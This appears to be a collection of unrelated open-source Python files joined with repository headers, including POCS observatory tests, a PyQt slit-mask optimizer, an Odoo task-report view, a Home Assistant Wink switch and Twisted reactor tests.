self.proxy = proxy
self.logger = logging.getLogger("proxy.utilserver")
handlers = [
(r"/ping", PingHandler),
(r"/info", InfoHandler),
(r"/logger", LogLevel),
]
super(UtilServer, self).__init__(handlers=handlers)
def log_request(self, handler):
request_time = 1000.0 * handler.request.request_time()
self.logger.info("%d %s %.2fms", handler.get_status(),
handler._request_summary(), request_time)
|
panoptes/POCS | refs/heads/develop | tests/test_pocs.py | 1 | import os
import threading
import time
import pytest
import requests
from astropy import units as u
from panoptes.pocs import hardware
from panoptes.pocs.core import POCS
from panoptes.pocs.observatory import Observatory
from panoptes.utils.config.client import set_config
from panoptes.utils.serializers import to_json, to_yaml
from panoptes.pocs.mount import create_mount_simulator
from panoptes.pocs.dome import create_dome_simulator
from panoptes.pocs.camera import create_cameras_from_config
from panoptes.pocs.scheduler import create_scheduler_from_config
from panoptes.pocs.utils.location import create_location_from_config
def reset_conf(config_host, config_port):
url = f'http://{config_host}:{config_port}/reset-config'
response = requests.post(url,
data=to_json({'reset': True}),
headers={'Content-Type': 'application/json'}
)
assert response.ok
@pytest.fixture(scope='function')
def cameras():
return create_cameras_from_config()
@pytest.fixture(scope='function')
def mount():
return create_mount_simulator()
@pytest.fixture(scope='function')
def pocstime_night():
return "2020-01-01 08:00:00"
@pytest.fixture(scope='function')
def pocstime_day():
return "2020-01-01 22:00:00"
@pytest.fixture(scope='function')
def site_details():
return create_location_from_config()
@pytest.fixture(scope='function')
def scheduler(site_details):
return create_scheduler_from_config(observer=site_details['observer'])
@pytest.fixture(scope='function')
def observatory(cameras, mount, site_details, scheduler):
"""Return a valid Observatory instance with a specific config."""
obs = Observatory(scheduler=scheduler, simulator=['power', 'weather'])
for cam_name, cam in cameras.items():
obs.add_camera(cam_name, cam)
obs.set_mount(mount)
return obs
@pytest.fixture(scope='function')
def dome():
set_config('dome', {
'brand': 'Simulacrum',
'driver': 'simulator',
})
return create_dome_simulator()
@pytest.fixture(scope='function')
def pocs(observatory, config_host, config_port):
os.environ['POCSTIME'] = '2020-01-01 08:00:00'
pocs = POCS(observatory, run_once=True, simulators=['power'])
yield pocs
pocs.power_down()
reset_conf(config_host, config_port)
@pytest.fixture(scope='function')
def pocs_with_dome(pocs, dome):
# Add dome to config
os.environ['POCSTIME'] = '2020-01-01 08:00:00'
pocs.observatory.set_dome(dome)
yield pocs
pocs.power_down()
# An observation that is valid during the day
@pytest.fixture(scope='module')
def valid_observation():
return {"field": {'name': 'TEST TARGET',
'position': '100.00 deg +00.887 deg'},
"observation": {'priority': '100',
'exptime': 2,
'min_nexp': 2,
'exp_set_size': 2}}
# An observation that is valid at night
@pytest.fixture(scope='module')
def valid_observation_day():
return {"field": {'name': 'TEST TARGET',
'position': '300.00 deg +70.887 deg'},
"observation": {'priority': '100',
'exptime': 2,
'min_nexp': 2,
'exp_set_size': 2}}
def test_observatory_cannot_observe(pocs):
scheduler = pocs.observatory.scheduler
pocs.observatory.scheduler = None
assert pocs.initialize() is False
pocs.observatory.scheduler = scheduler
assert pocs.initialize()
assert pocs.is_initialized
# Make sure we can do it twice.
assert pocs.initialize()
assert pocs.is_initialized
def test_simple_simulator(pocs, caplog):
assert isinstance(pocs, POCS)
pocs.set_config('simulator', 'all')
assert pocs.is_initialized is not True
# Not initialized returns false and gives warning.
assert pocs.run() is False
log_record = caplog.records[-1]
assert log_record.message == 'POCS not initialized' and log_record.levelname == "WARNING"
pocs.initialize()
assert pocs.is_initialized
pocs.state = 'parking'
pocs.next_state = 'parking'
assert pocs._lookup_trigger() == 'set_park'
pocs.state = 'foo'
assert pocs._lookup_trigger() == 'parking'
assert pocs.is_safe()
def test_is_weather_and_dark_simulator(pocs, pocstime_night, pocstime_day):
pocs.initialize()
# Night simulator
pocs.set_config('simulator', 'all')
os.environ['POCSTIME'] = pocstime_night # is dark
assert pocs.is_dark() is True
os.environ['POCSTIME'] = pocstime_day # is day
assert pocs.is_dark() is True
# No night simulator
pocs.set_config('simulator', hardware.get_all_names(without=['night']))
os.environ['POCSTIME'] = pocstime_night # is dark
assert pocs.is_dark() is True
os.environ['POCSTIME'] = pocstime_day # is day
assert pocs.is_dark() is False
pocs.set_config('simulator', ['camera', 'mount', 'weather', 'night'])
assert pocs.is_weather_safe() is True
def test_is_weather_safe_no_simulator(pocs):
pocs.initialize()
pocs.set_config('simulator', hardware.get_all_names(without=['weather']))
# Set a specific time
os.environ['POCSTIME'] = '2020-01-01 18:00:00'
# Insert a dummy weather record
pocs.db.insert_current('weather', {'safe': True})
assert pocs.is_weather_safe() is True
# Set a time 181 seconds later
os.environ['POCSTIME'] = '2020-01-01 18:05:01'
assert pocs.is_weather_safe() is False
def test_no_ac_power(pocs):
# Simulator makes AC power safe
assert pocs.has_ac_power() is True
# Remove 'power' from simulator
pocs.set_config('simulator', hardware.get_all_names(without=['power']))
pocs.initialize()
# With simulator removed the power should fail
assert pocs.has_ac_power() is False
for v in [True, 12.4, 0., False]:
has_power = bool(v)
# Add a fake power entry in data base
pocs.db.insert_current('power', {'main': v})
# Check for safe entry in database
assert pocs.has_ac_power() == has_power
assert pocs.is_safe() == has_power
# Check for stale entry in database
assert pocs.has_ac_power(stale=0.1) is False
# But double check it still matches longer entry
assert pocs.has_ac_power() == has_power
# Remove entry and try again
pocs.db.clear_current('power')
assert pocs.has_ac_power() is False
def test_power_down_while_running(pocs):
assert pocs.connected is True
assert not pocs.observatory.has_dome
pocs.initialize()
pocs.get_ready()
assert pocs.state == 'ready'
pocs.power_down()
assert pocs.observatory.mount.is_parked
assert pocs.connected is False
def test_power_down_dome_while_running(pocs_with_dome):
pocs = pocs_with_dome
assert pocs.connected is True
assert pocs.observatory.has_dome
assert not pocs.observatory.dome.is_connected
pocs.initialize()
assert pocs.observatory.dome.is_connected
pocs.get_ready()
assert pocs.state == 'ready'
pocs.power_down()
assert pocs.observatory.mount.is_parked
assert pocs.connected is False
assert not pocs.observatory.dome.is_connected
def test_run_no_targets_and_exit(pocs):
os.environ['POCSTIME'] = '2020-01-01 19:00:00'
pocs.set_config('simulator', 'all')
pocs.state = 'sleeping'
pocs.initialize()
pocs.observatory.scheduler.clear_available_observations()
assert pocs.is_initialized is True
pocs.run(exit_when_done=True, run_once=True)
assert pocs.state == 'sleeping'
def test_pocs_park_to_ready_with_observations(pocs):
# We don't want to run_once here
pocs.run_once = False
assert pocs.is_safe() is True
assert pocs.state == 'sleeping'
pocs.next_state = 'ready'
assert pocs.initialize()
assert pocs.goto_next_state()
assert pocs.state == 'ready'
assert pocs.goto_next_state()
assert pocs.state == 'scheduling'
assert pocs.observatory.current_observation is not None
# Manually set to parking
pocs.next_state = 'parking'
assert pocs.goto_next_state()
assert pocs.state == 'parking'
assert pocs.observatory.current_observation is None
assert pocs.observatory.mount.is_parked
assert pocs.goto_next_state()
assert pocs.state == 'parked'
# Should be safe and still have valid observations so next state should be ready
assert pocs.goto_next_state()
assert pocs.state == 'ready'
pocs.power_down()
assert pocs.connected is False
def test_pocs_park_to_ready_without_observations(pocs):
os.environ['POCSTIME'] = '2020-01-01 08:00:00'
pocs.logger.warning('Inserting safe weather reading')
pocs.db.insert_current('weather', {'safe': True})
assert pocs.is_safe() is True
assert pocs.state == 'sleeping'
pocs.next_state = 'ready'
assert pocs.initialize()
pocs.logger.warning('Moving to ready')
assert pocs.goto_next_state()
assert pocs.state == 'ready'
pocs.logger.warning('Moving to scheduling')
assert pocs.goto_next_state()
assert pocs.observatory.current_observation is not None
pocs.next_state = 'parking'
pocs.logger.warning('Moving to parking')
assert pocs.goto_next_state()
assert pocs.state == 'parking'
assert pocs.observatory.current_observation is None
assert pocs.observatory.mount.is_parked
# No valid obs
pocs.observatory.scheduler.clear_available_observations()
pocs.interrupted = True
assert pocs.goto_next_state()
assert pocs.state == 'parked'
pocs.power_down()
assert pocs.connected is False
assert pocs.is_safe() is False
def test_run_wait_until_safe(observatory, valid_observation_day, pocstime_day, pocstime_night):
os.environ['POCSTIME'] = pocstime_day
# Remove weather simulator, else it would always be safe.
observatory.set_config('simulator', hardware.get_all_names(without=['night']))
pocs = POCS(observatory)
pocs.set_config('wait_delay', 5) # Check safety every 5 seconds.
pocs.observatory.scheduler.clear_available_observations()
pocs.observatory.scheduler.add_observation(valid_observation_day)
assert pocs.connected is True
assert pocs.is_initialized is False
pocs.initialize()
pocs.logger.info('Starting observatory run')
# Not dark and unit is is connected but not set.
assert not pocs.is_dark()
assert pocs.is_initialized
assert pocs.connected
assert pocs.do_states
assert pocs.next_state is None
pocs.set_config('wait_delay', 1)
def start_pocs():
# Start running, BLOCKING.
pocs.logger.info('start_pocs ENTER')
pocs.run(run_once=True, exit_when_done=True)
# After done running.
assert pocs.is_weather_safe() is True
pocs.power_down()
observatory.logger.info('start_pocs EXIT')
pocs_thread = threading.Thread(target=start_pocs, daemon=True)
pocs_thread.start()
assert pocs.is_safe(park_if_not_safe=False) is False
# Wait to pretend we're waiting for horizon
time.sleep(5)
os.environ['POCSTIME'] = pocstime_night
assert pocs.is_dark()
pocs.logger.warning('Waiting to get to slewing state...')
while pocs.next_state != 'slewing':
time.sleep(1)
pocs.logger.warning('Stopping states via pocs.DO_STATES')
observatory.set_config('pocs.DO_STATES', False)
observatory.logger.warning('Waiting on pocs_thread')
pocs_thread.join(timeout=300)
assert pocs_thread.is_alive() is False
def test_unsafe_park(observatory, valid_observation, pocstime_night):
os.environ['POCSTIME'] = pocstime_night
# Remove weather simulator, else it would always be safe.
observatory.set_config('simulator', hardware.get_all_names(without=['night', 'weather']))
pocs = POCS(observatory)
pocs.set_config('wait_delay', 5) # Check safety every 5 seconds.
pocs.observatory.scheduler.clear_available_observations()
pocs.observatory.scheduler.add_observation(valid_observation)
observatory.logger.warning('Inserting safe weather reading')
observatory.db.insert_current('weather', {'safe': True})
assert pocs.connected is True
assert pocs.is_initialized is False
pocs.initialize()
pocs.logger.info('Starting observatory run')
# Weather is bad and unit is is connected but not set.
assert pocs.is_safe()
assert pocs.is_initialized
assert pocs.connected
assert pocs.do_states
assert pocs.next_state is None
pocs.set_config('wait_delay', 1)
def start_pocs():
# Start running, BLOCKING.
pocs.logger.info('start_pocs ENTER')
pocs.run(run_once=True, exit_when_done=True)
# After done running.
assert pocs.is_weather_safe() is False
pocs.power_down()
observatory.logger.info('start_pocs EXIT')
pocs_thread = threading.Thread(target=start_pocs, daemon=True)
pocs_thread.start()
# Insert bad weather report while slewing
pocs.logger.info('Waiting to get to slewing state...')
while pocs.state != "slewing":
pass
pocs.logger.info("Inserting bad weather record.")
observatory.db.insert_current('weather', {'safe': False})
# No longer safe, so should transition to parking
pocs.logger.info('Waiting to get to parked state...')
while True:
if pocs.state in ['parking', 'parked']:
break
assert pocs.state in ["slewing", "parking", "parked"] # Should be one of these states
time.sleep(0.5)
pocs.logger.warning('Stopping states via pocs.DO_STATES')
observatory.set_config('pocs.DO_STATES', False)
observatory.logger.warning('Waiting on pocs_thread')
pocs_thread.join(timeout=300)
assert pocs_thread.is_alive() is False
def test_run_power_down_interrupt(observatory,
valid_observation,
pocstime_night
):
os.environ['POCSTIME'] = pocstime_night
observatory.logger.info('start_pocs ENTER')
# Remove weather simulator, else it would always be safe.
observatory.set_config('simulator', 'all')
pocs = POCS(observatory)
pocs.set_config('wait_delay', 5) # Check safety every 5 seconds.
pocs.observatory.scheduler.clear_available_observations()
pocs.observatory.scheduler.add_observation(valid_observation)
pocs.initialize()
pocs.logger.info('Starting observatory run')
# Weather is bad and unit is is connected but not set.
assert pocs.connected
assert pocs.do_states
assert pocs.is_initialized
assert pocs.next_state is None
def start_pocs():
observatory.logger.info('start_pocs ENTER')
pocs.run(exit_when_done=True, run_once=True)
pocs.power_down()
observatory.logger.info('start_pocs EXIT')
pocs_thread = threading.Thread(target=start_pocs, daemon=True)
pocs_thread.start()
while pocs.next_state != 'slewing':
pocs.logger.debug(
f'Waiting to get to slewing state. Currently next_state={pocs.next_state}')
time.sleep(1)
pocs.logger.warning('Stopping states via pocs.DO_STATES')
observatory.set_config('pocs.DO_STATES', False)
observatory.logger.debug('Waiting on pocs_thread')
pocs_thread.join(timeout=300)
assert pocs_thread.is_alive() is False
def test_custom_state_file(observatory, temp_file, config_host, config_port):
state_table = POCS.load_state_table()
assert isinstance(state_table, dict)
with open(temp_file, 'w') as f:
f.write(to_yaml(state_table))
file_path = os.path.abspath(temp_file)
pocs = POCS(observatory, state_machine_file=file_path, run_once=True, simulators=['power'])
pocs.initialize()
pocs.power_down()
reset_conf(config_host, config_port)
def test_free_space(pocs, caplog):
assert pocs.has_free_space()
assert pocs.has_free_space(required_space=999 * u.terabyte) is False
assert 'No disk space' in caplog.records[-1].message
assert caplog.records[-1].levelname == 'ERROR'
def test_run_complete(pocs, valid_observation):
os.environ['POCSTIME'] = '2020-01-01 08:00:00'
pocs.set_config('simulator', 'all')
pocs.observatory.scheduler.clear_available_observations()
pocs.observatory.scheduler.add_observation(valid_observation)
pocs.initialize()
assert pocs.is_initialized is True
pocs.run(exit_when_done=True, run_once=True)
assert pocs.state == 'sleeping'
pocs.power_down()
|
crawfordsm/pysalt | refs/heads/placeholder | proptools/optimizetab.py | 2 | # -*- coding: utf-8 -*-
import os, sys
import numpy as np
from PyQt4 import QtCore, QtGui
from slitlets import Slitlets
import pyslit_optimize as opt
class OptimizeTab:
def __init__(self, ui, default_yspacing=1., default_iter=10):
print 'loading OPT'
self.ui = ui
self.slitlets=Slitlets()
self.opt_yspacing = default_yspacing
self.opt_niter = default_iter
def setoptimizer_yspacing(self):
self.opt_yspacing = self.checkyspacing_input(self.ui.lineEditOpt_Yspacing.text())
def setoptimizer_iter(self):
self.opt_niter = self.checkniter_input(self.ui.lineEditOpt_Niter.text())
def includerefstars(self):
if self.ui.checkBoxOpt_IncRefstars.isChecked():
nrefstars = len(np.where(self.slitlets.data['priority'] == -1)[0])
self.ui.lineEditOpt_AllRefstars.setText(str(nrefstars))
else:
self.ui.lineEditOpt_AllRefstars.setText('')
def setnumrefstars(self):
print self.ui.lineEditOpt_NumRefstars.text()
def optimize(self):
"""Run the optimizer program and optimize the slits"""
msg = "Optimize the Slitlets"
print msg
cra = self.slitmask.center_ra
cdec = self.slitmask.center_dec
rotang = self.slitmask.position_angle
equinox = 2000
is_in_fov = np.where(self.slitlets.data['fov_flag'] == 1)[0]
# jpk: this will need to be added in the next version
# is_in_fov = np.where((self.slitlets.data['inmask_flag'] == 1) * (self.slitlets.data['fov_flag'] == 1))[0]
ra = self.slitlets.data['targ_ra']
dec = self.slitlets.data['targ_dec']
pri = self.slitlets.data['priority']
slen = self.slitlets.data['len1'] + self.slitlets.data['len2']
swid = self.slitlets.data['width']
stilt = self.slitlets.data['tilt']
Nstars_req = 0. # **** Paul: I'm not quite sure where to get this from ****
Niter=10 # **** as above ****
# set all inmask flags to zero before running optimiser
#self.slitlets.emptymask()
# -- only run this on objects within FOV:
ok = is_in_fov
if not ok.any():
print "No objects in the field of view--update mask center and run again"
return
print ra[ok]
tra = ra[ok]
tdec = dec[ok]
tpri = pri[ok]
tslen = slen[ok]
tswid = swid[ok]
tstilt = stilt[ok]
print 'running optimizer'
tin_mask = opt.pyslit_optimize(cra, cdec, rotang, equinox, tra, tdec, \
tpri,tslen,tswid,tstilt,\
Niter,self.opt_yspacing, Nstars_req)
# apply index numbers to full list:
in_mask = ok[tin_mask]
# reset all the in_mask values, otherwise the objects which should not
# be in the optimized mask will still have a in_mask flag
self.slitlets.data['inmask_flag'] = 0
self.slitlets.data['collision_flag'] = 0
# now add the in_mask flag to the sources which was found by the
# optimizer
for sid in in_mask:
self.slitlets.addtomask(sid)
self.updatetabs()
def updatetabs(self):
self.slitmask.outFoV_all()
self.slitmask.find_collisions()
self.slitlets.update_flags()
# pass
def checkyspacing_input(self, x):
try:
val = float(x)
if val > 0:
return val
else:
self.opt_yspacing = 1
self.ui.lineEditOpt_Yspacing.setText(str(self.opt_yspacing))
except ValueError,e:
self.opt_yspacing = 1
self.ui.lineEditOpt_Yspacing.setText(str(self.opt_yspacing))
def checkniter_input(self,x):
try:
val = int(x)
if val > 0:
return val
else:
self.opt_niter = 10
self.ui.lineEditOpt_Niter.setText(str(self.opt_niter))
except ValueError,e:
self.opt_niter = 10
self.ui.lineEditOpt_Niter.setText(str(self.opt_niter))
|
chiragjogi/odoo | refs/heads/8.0 | addons/project/report/project_report.py | 279 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp import tools
class report_project_task_user(osv.osv):
_name = "report.project.task.user"
_description = "Tasks by user and project"
_auto = False
_columns = {
'name': fields.char('Task Summary', readonly=True),
'user_id': fields.many2one('res.users', 'Assigned To', readonly=True),
'reviewer_id': fields.many2one('res.users', 'Reviewer', readonly=True),
'date_start': fields.datetime('Assignation Date', readonly=True),
'no_of_days': fields.integer('# of Days', size=128, readonly=True),
'date_end': fields.datetime('Ending Date', readonly=True),
'date_deadline': fields.date('Deadline', readonly=True),
'date_last_stage_update': fields.datetime('Last Stage Update', readonly=True),
'project_id': fields.many2one('project.project', 'Project', readonly=True),
'hours_planned': fields.float('Planned Hours', readonly=True),
'hours_effective': fields.float('Effective Hours', readonly=True),
'hours_delay': fields.float('Avg. Plan.-Eff.', readonly=True),
'remaining_hours': fields.float('Remaining Hours', readonly=True),
'progress': fields.float('Progress', readonly=True, group_operator='avg'),
'total_hours': fields.float('Total Hours', readonly=True),
'closing_days': fields.float('Days to Close', digits=(16,2), readonly=True, group_operator="avg",
help="Number of Days to close the task"),
'opening_days': fields.float('Days to Assign', digits=(16,2), readonly=True, group_operator="avg",
help="Number of Days to Open the task"),
'delay_endings_days': fields.float('Overpassed Deadline', digits=(16,2), readonly=True),
'nbr': fields.integer('# of Tasks', readonly=True), # TDE FIXME master: rename into nbr_tasks
'priority': fields.selection([('0','Low'), ('1','Normal'), ('2','High')],
string='Priority', size=1, readonly=True),
'state': fields.selection([('normal', 'In Progress'),('blocked', 'Blocked'),('done', 'Ready for next stage')],'Status', readonly=True),
'company_id': fields.many2one('res.company', 'Company', readonly=True),
'partner_id': fields.many2one('res.partner', 'Contact', readonly=True),
'stage_id': fields.many2one('project.task.type', 'Stage'),
}
_order = 'name desc, project_id'
def init(self, cr):
tools.sql.drop_view_if_exists(cr, 'report_project_task_user')
cr.execute("""
CREATE view report_project_task_user as
SELECT
(select 1 ) AS nbr,
t.id as id,
t.date_start as date_start,
t.date_end as date_end,
t.date_last_stage_update as date_last_stage_update,
t.date_deadline as date_deadline,
abs((extract('epoch' from (t.write_date-t.date_start)))/(3600*24)) as no_of_days,
t.user_id,
t.reviewer_id,
progress as progress,
t.project_id,
t.effective_hours as hours_effective,
t.priority,
t.name as name,
t.company_id,
t.partner_id,
t.stage_id as stage_id,
t.kanban_state as state,
remaining_hours as remaining_hours,
total_hours as total_hours,
t.delay_hours as hours_delay,
planned_hours as hours_planned,
(extract('epoch' from (t.write_date-t.create_date)))/(3600*24) as closing_days,
(extract('epoch' from (t.date_start-t.create_date)))/(3600*24) as opening_days,
(extract('epoch' from (t.date_deadline-(now() at time zone 'UTC'))))/(3600*24) as delay_endings_days
FROM project_task t
WHERE t.active = 'true'
GROUP BY
t.id,
remaining_hours,
t.effective_hours,
progress,
total_hours,
planned_hours,
hours_delay,
create_date,
write_date,
date_start,
date_end,
date_deadline,
date_last_stage_update,
t.user_id,
t.reviewer_id,
t.project_id,
t.priority,
name,
t.company_id,
t.partner_id,
stage_id
""")
|
toontownfunserver/Panda3D-1.9.0 | refs/heads/master | direct/task/__init__.py | 12133432 | |
swirlingsand/self-driving-car-nanodegree-nd013 | refs/heads/master | p4-CarND-Advanced-Lane-Lines/__init__.py | 12133432 | |
shanemcd/ansible | refs/heads/devel | test/integration/targets/module_utils/module_utils/spam5/__init__.py | 12133432 | |
philanthropy-u/edx-platform | refs/heads/master | openedx/core/djangoapps/user_api/course_tag/__init__.py | 12133432 | |
rubencabrera/micropython | refs/heads/master | tests/cmdline/repl_basic.py | 52 | # basic REPL tests
print(1)
[A
|
aptana/Pydev | refs/heads/development | bundles/org.python.pydev.jython/Lib/email/Errors.py | 11 | # Copyright (C) 2001,2002 Python Software Foundation
# Author: barry@zope.com (Barry Warsaw)
"""email package exception classes.
"""
class MessageError(Exception):
"""Base class for errors in the email package."""
class MessageParseError(MessageError):
"""Base class for message parsing errors."""
class HeaderParseError(MessageParseError):
"""Error while parsing headers."""
class BoundaryError(MessageParseError):
"""Couldn't find terminating boundary."""
class MultipartConversionError(MessageError, TypeError):
"""Conversion to a multipart is prohibited."""
|
alexkolar/home-assistant | refs/heads/dev | homeassistant/components/switch/wink.py | 10 | """
homeassistant.components.switch.wink
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Support for Wink switches.
"""
import logging
from homeassistant.components.wink import WinkToggleDevice
from homeassistant.const import CONF_ACCESS_TOKEN
REQUIREMENTS = ['https://github.com/balloob/python-wink/archive/'
'c2b700e8ca866159566ecf5e644d9c297f69f257.zip'
'#python-wink==0.1']
def setup_platform(hass, config, add_devices, discovery_info=None):
""" Sets up the Wink platform. """
import pywink
if discovery_info is None:
token = config.get(CONF_ACCESS_TOKEN)
if token is None:
logging.getLogger(__name__).error(
"Missing wink access_token - "
"get one at https://winkbearertoken.appspot.com/")
return
pywink.set_bearer_token(token)
add_devices(WinkToggleDevice(switch) for switch in pywink.get_switches())
|
mspark93/VTK | refs/heads/master | ThirdParty/Twisted/twisted/internet/test/test_posixbase.py | 33 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.internet.posixbase} and supporting code.
"""
from __future__ import division, absolute_import
from twisted.python.compat import _PY3
from twisted.trial.unittest import TestCase
from twisted.internet.defer import Deferred
from twisted.internet.posixbase import PosixReactorBase, _Waker
from twisted.internet.protocol import ServerFactory
skipSockets = None
if _PY3:
skipSockets = "Re-enable when Python 3 port supports AF_UNIX"
else:
try:
from twisted.internet import unix
from twisted.test.test_unix import ClientProto
except ImportError:
skipSockets = "Platform does not support AF_UNIX sockets"
from twisted.internet.tcp import Port
from twisted.internet import reactor
class TrivialReactor(PosixReactorBase):
def __init__(self):
self._readers = {}
self._writers = {}
PosixReactorBase.__init__(self)
def addReader(self, reader):
self._readers[reader] = True
def removeReader(self, reader):
del self._readers[reader]
def addWriter(self, writer):
self._writers[writer] = True
def removeWriter(self, writer):
del self._writers[writer]
class PosixReactorBaseTests(TestCase):
"""
Tests for L{PosixReactorBase}.
"""
def _checkWaker(self, reactor):
self.assertIsInstance(reactor.waker, _Waker)
self.assertIn(reactor.waker, reactor._internalReaders)
self.assertIn(reactor.waker, reactor._readers)
def test_wakerIsInternalReader(self):
"""
When L{PosixReactorBase} is instantiated, it creates a waker and adds
it to its internal readers set.
"""
reactor = TrivialReactor()
self._checkWaker(reactor)
def test_removeAllSkipsInternalReaders(self):
"""
Any L{IReadDescriptors} in L{PosixReactorBase._internalReaders} are
left alone by L{PosixReactorBase._removeAll}.
"""
reactor = TrivialReactor()
extra = object()
reactor._internalReaders.add(extra)
reactor.addReader(extra)
reactor._removeAll(reactor._readers, reactor._writers)
self._checkWaker(reactor)
self.assertIn(extra, reactor._internalReaders)
self.assertIn(extra, reactor._readers)
def test_removeAllReturnsRemovedDescriptors(self):
"""
L{PosixReactorBase._removeAll} returns a list of removed
L{IReadDescriptor} and L{IWriteDescriptor} objects.
"""
reactor = TrivialReactor()
reader = object()
writer = object()
reactor.addReader(reader)
reactor.addWriter(writer)
removed = reactor._removeAll(
reactor._readers, reactor._writers)
self.assertEqual(set(removed), set([reader, writer]))
self.assertNotIn(reader, reactor._readers)
self.assertNotIn(writer, reactor._writers)
class TCPPortTests(TestCase):
"""
Tests for L{twisted.internet.tcp.Port}.
"""
if not isinstance(reactor, PosixReactorBase):
skip = "Non-posixbase reactor"
def test_connectionLostFailed(self):
"""
L{Port.stopListening} returns a L{Deferred} which errbacks if
L{Port.connectionLost} raises an exception.
"""
port = Port(12345, ServerFactory())
port.connected = True
port.connectionLost = lambda reason: 1 // 0
return self.assertFailure(port.stopListening(), ZeroDivisionError)
class TimeoutReportReactor(PosixReactorBase):
"""
A reactor which is just barely runnable and which cannot monitor any
readers or writers, and which fires a L{Deferred} with the timeout
passed to its C{doIteration} method as soon as that method is invoked.
"""
def __init__(self):
PosixReactorBase.__init__(self)
self.iterationTimeout = Deferred()
self.now = 100
def addReader(self, reader):
"""
Ignore the reader. This is necessary because the waker will be
added. However, we won't actually monitor it for any events.
"""
def removeAll(self):
"""
There are no readers or writers, so there is nothing to remove.
This will be called when the reactor stops, though, so it must be
implemented.
"""
return []
def seconds(self):
"""
Override the real clock with a deterministic one that can be easily
controlled in a unit test.
"""
return self.now
def doIteration(self, timeout):
d = self.iterationTimeout
if d is not None:
self.iterationTimeout = None
d.callback(timeout)
class IterationTimeoutTests(TestCase):
"""
Tests for the timeout argument L{PosixReactorBase.run} calls
L{PosixReactorBase.doIteration} with in the presence of various delayed
calls.
"""
def _checkIterationTimeout(self, reactor):
timeout = []
reactor.iterationTimeout.addCallback(timeout.append)
reactor.iterationTimeout.addCallback(lambda ignored: reactor.stop())
reactor.run()
return timeout[0]
def test_noCalls(self):
"""
If there are no delayed calls, C{doIteration} is called with a
timeout of C{None}.
"""
reactor = TimeoutReportReactor()
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, None)
def test_delayedCall(self):
"""
If there is a delayed call, C{doIteration} is called with a timeout
which is the difference between the current time and the time at
which that call is to run.
"""
reactor = TimeoutReportReactor()
reactor.callLater(100, lambda: None)
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 100)
def test_timePasses(self):
"""
If a delayed call is scheduled and then some time passes, the
timeout passed to C{doIteration} is reduced by the amount of time
which passed.
"""
reactor = TimeoutReportReactor()
reactor.callLater(100, lambda: None)
reactor.now += 25
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 75)
def test_multipleDelayedCalls(self):
"""
If there are several delayed calls, C{doIteration} is called with a
timeout which is the difference between the current time and the
time at which the earlier of the two calls is to run.
"""
reactor = TimeoutReportReactor()
reactor.callLater(50, lambda: None)
reactor.callLater(10, lambda: None)
reactor.callLater(100, lambda: None)
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 10)
def test_resetDelayedCall(self):
"""
If a delayed call is reset, the timeout passed to C{doIteration} is
based on the interval between the time when reset is called and the
new delay of the call.
"""
reactor = TimeoutReportReactor()
call = reactor.callLater(50, lambda: None)
reactor.now += 25
call.reset(15)
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 15)
def test_delayDelayedCall(self):
"""
If a delayed call is re-delayed, the timeout passed to
C{doIteration} is based on the remaining time before the call would
have been made and the additional amount of time passed to the delay
method.
"""
reactor = TimeoutReportReactor()
call = reactor.callLater(50, lambda: None)
reactor.now += 10
call.delay(20)
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, 60)
def test_cancelDelayedCall(self):
"""
If the only delayed call is canceled, C{None} is the timeout passed
to C{doIteration}.
"""
reactor = TimeoutReportReactor()
call = reactor.callLater(50, lambda: None)
call.cancel()
timeout = self._checkIterationTimeout(reactor)
self.assertEqual(timeout, None)
class ConnectedDatagramPortTestCase(TestCase):
"""
Test connected datagram UNIX sockets.
"""
if skipSockets is not None:
skip = skipSockets
def test_connectionFailedDoesntCallLoseConnection(self):
"""
L{ConnectedDatagramPort} does not call the deprecated C{loseConnection}
in L{ConnectedDatagramPort.connectionFailed}.
"""
def loseConnection():
"""
Dummy C{loseConnection} method. C{loseConnection} is deprecated and
should not get called.
"""
self.fail("loseConnection is deprecated and should not get called.")
port = unix.ConnectedDatagramPort(None, ClientProto())
port.loseConnection = loseConnection
port.connectionFailed("goodbye")
def test_connectionFailedCallsStopListening(self):
"""
L{ConnectedDatagramPort} calls L{ConnectedDatagramPort.stopListening}
instead of the deprecated C{loseConnection} in
L{ConnectedDatagramPort.connectionFailed}.
"""
self.called = False
def stopListening():
"""
Dummy C{stopListening} method.
"""
self.called = True
port = unix.ConnectedDatagramPort(None, ClientProto())
port.stopListening = stopListening
port.connectionFailed("goodbye")
self.assertEqual(self.called, True)
|
ChronoMonochrome/android_external_chromium_org | refs/heads/cm-11.0 | tools/telemetry/telemetry/page/page_set_unittest.py | 25 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import tempfile
import unittest
from telemetry.page import page_set
simple_archive_info = """
{
"archives": {
"data_01.wpr": ["http://www.foo.com/"],
"data_02.wpr": ["http://www.bar.com/"]
}
}
"""
simple_set = """
{"description": "hello",
"archive_data_file": "%s",
"pages": [
{"url": "http://www.foo.com/"},
{"url": "http://www.bar.com/"}
]
}
"""
class TestPageSet(unittest.TestCase):
def testSimpleSet(self):
try:
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(simple_archive_info)
with tempfile.NamedTemporaryFile(delete=False) as f2:
f2.write(simple_set % f.name.replace('\\', '\\\\'))
ps = page_set.PageSet.FromFile(f2.name)
finally:
os.remove(f.name)
os.remove(f2.name)
self.assertEquals('hello', ps.description)
